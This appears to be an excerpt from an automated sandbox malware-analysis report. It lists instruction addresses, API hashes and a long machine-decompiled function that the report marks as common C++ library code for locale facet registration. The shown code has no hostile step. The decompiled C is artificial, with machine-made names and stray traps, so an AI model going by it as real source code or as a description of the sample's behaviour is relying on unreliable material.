                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F4C8
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F4D2
                          • int.LIBCPMT ref: 6E20F4E9
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F523
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F543
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F561
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: tm,n
                          • API String ID: 651022567-372086613
                          • Opcode ID: 1951ed48773d5ff228fac4f0635718d98ab2077ab9a3fa9f3a9494e45eddadb4
                          • Instruction ID: 3d7b4184a9cf290e8d376da37961dc493cf19a053d9752398efd262e1cf1dcd8
                          • Opcode Fuzzy Hash: 1951ed48773d5ff228fac4f0635718d98ab2077ab9a3fa9f3a9494e45eddadb4
                          • Instruction Fuzzy Hash: 9411C67991091E9BCF01DBE4CC94AEEB77BBF44B18F240908E5106B2D0EFB4AA44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F375, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F375(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t223;
				signed int _t224;
				void* _t236;
				void* _t249;
				void* _t262;
				void* _t275;
				void* _t288;
				void* _t301;
				void* _t314;
				void* _t327;
				void* _t340;
				void* _t353;
				void* _t366;
				void* _t379;
				void* _t392;
				void* _t405;
				signed int _t587;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				void* _t682;

				_t633 = __edx;
				_t482 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t682 - 0x14, 0);
				_t651 =  *0x6e2c6dbc; // 0x0
				 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
				 *(_t682 - 0x10) = _t651;
				_t223 = E6E1E161C(0x6e2c6d70);
				_t485 =  *((intOrPtr*)(_t682 + 8));
				_t224 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t223);
				_t635 = _t224;
				if(_t224 != 0) {
					L5:
					E6E2066BA(_t682 - 0x14);
					return E6E220075(_t635);
				} else {
					if(_t651 == 0) {
						_push( *((intOrPtr*)(_t682 + 8)));
						_push(_t682 - 0x10);
						__eflags = E6E210FEF(__ebx, _t485, __edx, _t635, _t651) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t682 - 0x20);
							E6E223D74(_t682 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t635, _t651, 0x14);
							E6E206653(_t682 - 0x14, 0);
							_t652 =  *0x6e2c6df0; // 0x0
							 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
							 *(_t682 - 0x10) = _t652;
							_t236 = E6E1E161C(0x6e2c6d9c);
							_t492 =  *((intOrPtr*)(_t682 + 8));
							_t636 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t236);
							__eflags = _t636;
							if(_t636 != 0) {
								L12:
								E6E2066BA(_t682 - 0x14);
								return E6E220075(_t636);
							} else {
								__eflags = _t652;
								if(_t652 == 0) {
									_push( *((intOrPtr*)(_t682 + 8)));
									_push(_t682 - 0x10);
									__eflags = E6E211057(_t482, _t492, __edx, _t636, _t652) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t682 - 0x20);
										E6E223D74(_t682 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t482, _t636, _t652, 0x14);
										E6E206653(_t682 - 0x14, 0);
										_t653 =  *0x6e2c6dc0; // 0x0
										 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
										 *(_t682 - 0x10) = _t653;
										_t249 = E6E1E161C(0x6e2c6d74);
										_t499 =  *((intOrPtr*)(_t682 + 8));
										_t637 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t249);
										__eflags = _t637;
										if(_t637 != 0) {
											L19:
											E6E2066BA(_t682 - 0x14);
											return E6E220075(_t637);
										} else {
											__eflags = _t653;
											if(_t653 == 0) {
												_push( *((intOrPtr*)(_t682 + 8)));
												_push(_t682 - 0x10);
												__eflags = E6E2110BF(_t482, _t499, __edx, _t637, _t653) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t682 - 0x20);
													E6E223D74(_t682 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t482, _t637, _t653, 0x14);
													E6E206653(_t682 - 0x14, 0);
													_t654 =  *0x6e2c6df8; // 0x0
													 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
													 *(_t682 - 0x10) = _t654;
													_t262 = E6E1E161C(0x6e2c6da4);
													_t506 =  *((intOrPtr*)(_t682 + 8));
													_t638 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t262);
													__eflags = _t638;
													if(_t638 != 0) {
														L26:
														E6E2066BA(_t682 - 0x14);
														return E6E220075(_t638);
													} else {
														__eflags = _t654;
														if(_t654 == 0) {
															_push( *((intOrPtr*)(_t682 + 8)));
															_push(_t682 - 0x10);
															__eflags = E6E211127(_t482, _t506, _t633, _t638, _t654) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t682 - 0x20);
																E6E223D74(_t682 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t482, _t638, _t654, 0x14);
																E6E206653(_t682 - 0x14, 0);
																_t655 =  *0x6e2c6df4; // 0x0
																 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																 *(_t682 - 0x10) = _t655;
																_t275 = E6E1E161C(0x6e2c6da0);
																_t513 =  *((intOrPtr*)(_t682 + 8));
																_t639 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t275);
																__eflags = _t639;
																if(_t639 != 0) {
																	L33:
																	E6E2066BA(_t682 - 0x14);
																	return E6E220075(_t639);
																} else {
																	__eflags = _t655;
																	if(_t655 == 0) {
																		_push( *((intOrPtr*)(_t682 + 8)));
																		_push(_t682 - 0x10);
																		__eflags = E6E2111AB(_t482, _t513, _t633, _t639, _t655) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t682 - 0x20);
																			E6E223D74(_t682 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t482, _t639, _t655, 0x14);
																			E6E206653(_t682 - 0x14, 0);
																			_t656 =  *0x6e2c6dc8; // 0x0
																			 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																			 *(_t682 - 0x10) = _t656;
																			_t288 = E6E1E161C(0x6e2c6d7c);
																			_t520 =  *((intOrPtr*)(_t682 + 8));
																			_t640 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t288);
																			__eflags = _t640;
																			if(_t640 != 0) {
																				L40:
																				E6E2066BA(_t682 - 0x14);
																				return E6E220075(_t640);
																			} else {
																				__eflags = _t656;
																				if(_t656 == 0) {
																					_push( *((intOrPtr*)(_t682 + 8)));
																					_push(_t682 - 0x10);
																					__eflags = E6E211230(_t482, _t520, _t633, _t640, _t656) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t682 - 0x20);
																						E6E223D74(_t682 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t482, _t640, _t656, 0x14);
																						E6E206653(_t682 - 0x14, 0);
																						_t657 =  *0x6e2c6dc4; // 0x0
																						 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																						 *(_t682 - 0x10) = _t657;
																						_t301 = E6E1E161C(0x6e2c6d78);
																						_t527 =  *((intOrPtr*)(_t682 + 8));
																						_t641 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t301);
																						__eflags = _t641;
																						if(_t641 != 0) {
																							L47:
																							E6E2066BA(_t682 - 0x14);
																							return E6E220075(_t641);
																						} else {
																							__eflags = _t657;
																							if(_t657 == 0) {
																								_push( *((intOrPtr*)(_t682 + 8)));
																								_push(_t682 - 0x10);
																								__eflags = E6E2112B4(_t482, _t527, _t633, _t641, _t657) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t682 - 0x20);
																									E6E223D74(_t682 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t482, _t641, _t657, 0x14);
																									E6E206653(_t682 - 0x14, 0);
																									_t658 =  *0x6e2c6dd8; // 0x0
																									 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																									 *(_t682 - 0x10) = _t658;
																									_t314 = E6E1E161C(0x6e2c6d84);
																									_t534 =  *((intOrPtr*)(_t682 + 8));
																									_t642 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t314);
																									__eflags = _t642;
																									if(_t642 != 0) {
																										L54:
																										E6E2066BA(_t682 - 0x14);
																										return E6E220075(_t642);
																									} else {
																										__eflags = _t658;
																										if(_t658 == 0) {
																											_push( *((intOrPtr*)(_t682 + 8)));
																											_push(_t682 - 0x10);
																											__eflags = E6E211339(_t482, _t534, _t633, _t642, _t658) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t682 - 0x20);
																												E6E223D74(_t682 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t482, _t642, _t658, 0x14);
																												E6E206653(_t682 - 0x14, 0);
																												_t659 =  *0x6e2c6db0; // 0x0
																												 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																												 *(_t682 - 0x10) = _t659;
																												_t327 = E6E1E161C(0x6e2c6d64);
																												_t541 =  *((intOrPtr*)(_t682 + 8));
																												_t643 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t327);
																												__eflags = _t643;
																												if(_t643 != 0) {
																													L61:
																													E6E2066BA(_t682 - 0x14);
																													return E6E220075(_t643);
																												} else {
																													__eflags = _t659;
																													if(_t659 == 0) {
																														_push( *((intOrPtr*)(_t682 + 8)));
																														_push(_t682 - 0x10);
																														__eflags = E6E2113A1(_t482, _t541, _t633, _t643, _t659) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t682 - 0x20);
																															E6E223D74(_t682 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t482, _t643, _t659, 0x14);
																															E6E206653(_t682 - 0x14, 0);
																															_t660 =  *0x6e2c6ddc; // 0x0
																															 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																															 *(_t682 - 0x10) = _t660;
																															_t340 = E6E1E161C(0x6e2c6d88);
																															_t548 =  *((intOrPtr*)(_t682 + 8));
																															_t644 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t340);
																															__eflags = _t644;
																															if(_t644 != 0) {
																																L68:
																																E6E2066BA(_t682 - 0x14);
																																return E6E220075(_t644);
																															} else {
																																__eflags = _t660;
																																if(_t660 == 0) {
																																	_push( *((intOrPtr*)(_t682 + 8)));
																																	_push(_t682 - 0x10);
																																	__eflags = E6E211409(_t482, _t548, _t633, _t644, _t660) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t682 - 0x20);
																																		E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t482, _t644, _t660, 0x14);
																																		E6E206653(_t682 - 0x14, 0);
																																		_t661 =  *0x6e2c6de0; // 0x0
																																		 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																		 *(_t682 - 0x10) = _t661;
																																		_t353 = E6E1E161C(0x6e2c6d8c);
																																		_t555 =  *((intOrPtr*)(_t682 + 8));
																																		_t645 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t353);
																																		__eflags = _t645;
																																		if(_t645 != 0) {
																																			L75:
																																			E6E2066BA(_t682 - 0x14);
																																			return E6E220075(_t645);
																																		} else {
																																			__eflags = _t661;
																																			if(_t661 == 0) {
																																				_push( *((intOrPtr*)(_t682 + 8)));
																																				_push(_t682 - 0x10);
																																				__eflags = E6E211471(_t482, _t555, _t633, _t645, _t661) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t682 - 0x20);
																																					E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t482, _t645, _t661, 0x14);
																																					E6E206653(_t682 - 0x14, 0);
																																					_t662 =  *0x6e2c6dfc; // 0x0
																																					 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																					 *(_t682 - 0x10) = _t662;
																																					_t366 = E6E1E161C(0x6e2c6da8);
																																					_t562 =  *((intOrPtr*)(_t682 + 8));
																																					_t646 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t366);
																																					__eflags = _t646;
																																					if(_t646 != 0) {
																																						L82:
																																						E6E2066BA(_t682 - 0x14);
																																						return E6E220075(_t646);
																																					} else {
																																						__eflags = _t662;
																																						if(_t662 == 0) {
																																							_push( *((intOrPtr*)(_t682 + 8)));
																																							_push(_t682 - 0x10);
																																							__eflags = E6E2114EC(_t482, _t562, _t633, _t646, _t662) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t682 - 0x20);
																																								E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t482, _t646, _t662, 0x14);
																																								E6E206653(_t682 - 0x14, 0);
																																								_t663 =  *0x6e2c6dcc; // 0x0
																																								 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																								 *(_t682 - 0x10) = _t663;
																																								_t379 = E6E1E161C(0x6e2c6d80);
																																								_t569 =  *((intOrPtr*)(_t682 + 8));
																																								_t647 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t379);
																																								__eflags = _t647;
																																								if(_t647 != 0) {
																																									L89:
																																									E6E2066BA(_t682 - 0x14);
																																									return E6E220075(_t647);
																																								} else {
																																									__eflags = _t663;
																																									if(_t663 == 0) {
																																										_push( *((intOrPtr*)(_t682 + 8)));
																																										_push(_t682 - 0x10);
																																										__eflags = E6E211558(_t482, _t569, _t633, _t647, _t663) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t682 - 0x20);
																																											E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t482, _t647, _t663, 0x14);
																																											E6E206653(_t682 - 0x14, 0);
																																											_t664 =  *0x6e2c6e00; // 0x0
																																											 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																											 *(_t682 - 0x10) = _t664;
																																											_t392 = E6E1E161C(0x6e2c6dac);
																																											_t576 =  *((intOrPtr*)(_t682 + 8));
																																											_t648 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t392);
																																											__eflags = _t648;
																																											if(_t648 != 0) {
																																												L96:
																																												E6E2066BA(_t682 - 0x14);
																																												return E6E220075(_t648);
																																											} else {
																																												__eflags = _t664;
																																												if(_t664 == 0) {
																																													_push( *((intOrPtr*)(_t682 + 8)));
																																													_push(_t682 - 0x10);
																																													__eflags = E6E2115C4(_t482, _t576, _t633, _t648, _t664) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t682 - 0x20);
																																														E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t482, _t648, _t664, 0x14);
																																														E6E206653(_t682 - 0x14, 0);
																																														_t665 =  *0x6e2c6dd0; // 0x0
																																														 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																														 *(_t682 - 0x10) = _t665;
																																														_t405 = E6E1E161C(0x6e2c6d60);
																																														_t583 =  *((intOrPtr*)(_t682 + 8));
																																														_t649 = E6E1E171B( *((intOrPtr*)(_t682 + 8)), _t405);
																																														__eflags = _t649;
																																														if(_t649 != 0) {
																																															L103:
																																															E6E2066BA(_t682 - 0x14);
																																															return E6E220075(_t649);
																																														} else {
																																															__eflags = _t665;
																																															if(_t665 == 0) {
																																																_push( *((intOrPtr*)(_t682 + 8)));
																																																_push(_t682 - 0x10);
																																																__eflags = E6E21162A(_t482, _t583, _t633, _t649, _t665) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	_t587 = _t682 - 0x20;
																																																	E6E1E1438(_t587);
																																																	E6E223D74(_t682 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e26851f, _t482, _t649, _t665, 4);
																																																	_t666 = _t587;
																																																	 *(_t682 - 0x10) = _t666;
																																																	 *((intOrPtr*)(_t666 + 4)) =  *((intOrPtr*)(_t682 + 0xc));
																																																	_push( *((intOrPtr*)(_t682 + 0x14)));
																																																	_t217 = _t682 - 4;
																																																	 *_t217 =  *(_t682 - 4) & 0x00000000;
																																																	__eflags =  *_t217;
																																																	 *_t666 = 0x6e26c0c4;
																																																	 *((char*)(_t666 + 0x28)) =  *((intOrPtr*)(_t682 + 0x10));
																																																	E6E21542F(_t482, _t587, _t633, _t649, _t666,  *_t217);
																																																	return E6E220075(_t666,  *((intOrPtr*)(_t682 + 8)));
																																																} else {
																																																	_t649 =  *(_t682 - 0x10);
																																																	 *(_t682 - 0x10) = _t649;
																																																	 *(_t682 - 4) = 1;
																																																	E6E206FD3(__eflags, _t649);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t649 + 4))))();
																																																	 *0x6e2c6dd0 = _t649;
																																																	goto L103;
																																																}
																																															} else {
																																																_t649 = _t665;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t648 =  *(_t682 - 0x10);
																																														 *(_t682 - 0x10) = _t648;
																																														 *(_t682 - 4) = 1;
																																														E6E206FD3(__eflags, _t648);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t648 + 4))))();
																																														 *0x6e2c6e00 = _t648;
																																														goto L96;
																																													}
																																												} else {
																																													_t648 = _t664;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t647 =  *(_t682 - 0x10);
																																											 *(_t682 - 0x10) = _t647;
																																											 *(_t682 - 4) = 1;
																																											E6E206FD3(__eflags, _t647);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t647 + 4))))();
																																											 *0x6e2c6dcc = _t647;
																																											goto L89;
																																										}
																																									} else {
																																										_t647 = _t663;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t646 =  *(_t682 - 0x10);
																																								 *(_t682 - 0x10) = _t646;
																																								 *(_t682 - 4) = 1;
																																								E6E206FD3(__eflags, _t646);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t646 + 4))))();
																																								 *0x6e2c6dfc = _t646;
																																								goto L82;
																																							}
																																						} else {
																																							_t646 = _t662;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t645 =  *(_t682 - 0x10);
																																					 *(_t682 - 0x10) = _t645;
																																					 *(_t682 - 4) = 1;
																																					E6E206FD3(__eflags, _t645);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t645 + 4))))();
																																					 *0x6e2c6de0 = _t645;
																																					goto L75;
																																				}
																																			} else {
																																				_t645 = _t661;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t644 =  *(_t682 - 0x10);
																																		 *(_t682 - 0x10) = _t644;
																																		 *(_t682 - 4) = 1;
																																		E6E206FD3(__eflags, _t644);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t644 + 4))))();
																																		 *0x6e2c6ddc = _t644;
																																		goto L68;
																																	}
																																} else {
																																	_t644 = _t660;
																																	goto L68;
																																}
																															}
																														} else {
																															_t643 =  *(_t682 - 0x10);
																															 *(_t682 - 0x10) = _t643;
																															 *(_t682 - 4) = 1;
																															E6E206FD3(__eflags, _t643);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t643 + 4))))();
																															 *0x6e2c6db0 = _t643;
																															goto L61;
																														}
																													} else {
																														_t643 = _t659;
																														goto L61;
																													}
																												}
																											} else {
																												_t642 =  *(_t682 - 0x10);
																												 *(_t682 - 0x10) = _t642;
																												 *(_t682 - 4) = 1;
																												E6E206FD3(__eflags, _t642);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t642 + 4))))();
																												 *0x6e2c6dd8 = _t642;
																												goto L54;
																											}
																										} else {
																											_t642 = _t658;
																											goto L54;
																										}
																									}
																								} else {
																									_t641 =  *(_t682 - 0x10);
																									 *(_t682 - 0x10) = _t641;
																									 *(_t682 - 4) = 1;
																									E6E206FD3(__eflags, _t641);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t641 + 4))))();
																									 *0x6e2c6dc4 = _t641;
																									goto L47;
																								}
																							} else {
																								_t641 = _t657;
																								goto L47;
																							}
																						}
																					} else {
																						_t640 =  *(_t682 - 0x10);
																						 *(_t682 - 0x10) = _t640;
																						 *(_t682 - 4) = 1;
																						E6E206FD3(__eflags, _t640);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t640 + 4))))();
																						 *0x6e2c6dc8 = _t640;
																						goto L40;
																					}
																				} else {
																					_t640 = _t656;
																					goto L40;
																				}
																			}
																		} else {
																			_t639 =  *(_t682 - 0x10);
																			 *(_t682 - 0x10) = _t639;
																			 *(_t682 - 4) = 1;
																			E6E206FD3(__eflags, _t639);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t639 + 4))))();
																			 *0x6e2c6df4 = _t639;
																			goto L33;
																		}
																	} else {
																		_t639 = _t655;
																		goto L33;
																	}
																}
															} else {
																_t638 =  *(_t682 - 0x10);
																 *(_t682 - 0x10) = _t638;
																 *(_t682 - 4) = 1;
																E6E206FD3(__eflags, _t638);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t638 + 4))))();
																 *0x6e2c6df8 = _t638;
																goto L26;
															}
														} else {
															_t638 = _t654;
															goto L26;
														}
													}
												} else {
													_t637 =  *(_t682 - 0x10);
													 *(_t682 - 0x10) = _t637;
													 *(_t682 - 4) = 1;
													E6E206FD3(__eflags, _t637);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t637 + 4))))();
													 *0x6e2c6dc0 = _t637;
													goto L19;
												}
											} else {
												_t637 = _t653;
												goto L19;
											}
										}
									} else {
										_t636 =  *(_t682 - 0x10);
										 *(_t682 - 0x10) = _t636;
										 *(_t682 - 4) = 1;
										E6E206FD3(__eflags, _t636);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t636 + 4))))();
										 *0x6e2c6df0 = _t636;
										goto L12;
									}
								} else {
									_t636 = _t652;
									goto L12;
								}
							}
						} else {
							_t635 =  *(_t682 - 0x10);
							 *(_t682 - 0x10) = _t635;
							 *(_t682 - 4) = 1;
							E6E206FD3(__eflags, _t635);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t635 + 4))))();
							 *0x6e2c6dbc = _t635;
							goto L5;
						}
					} else {
						_t635 = _t651;
						goto L5;
					}
				}
			}



















































                          0x6e20f375
                          0x6e20f375
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3a6
                          0x6e20f3ab
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
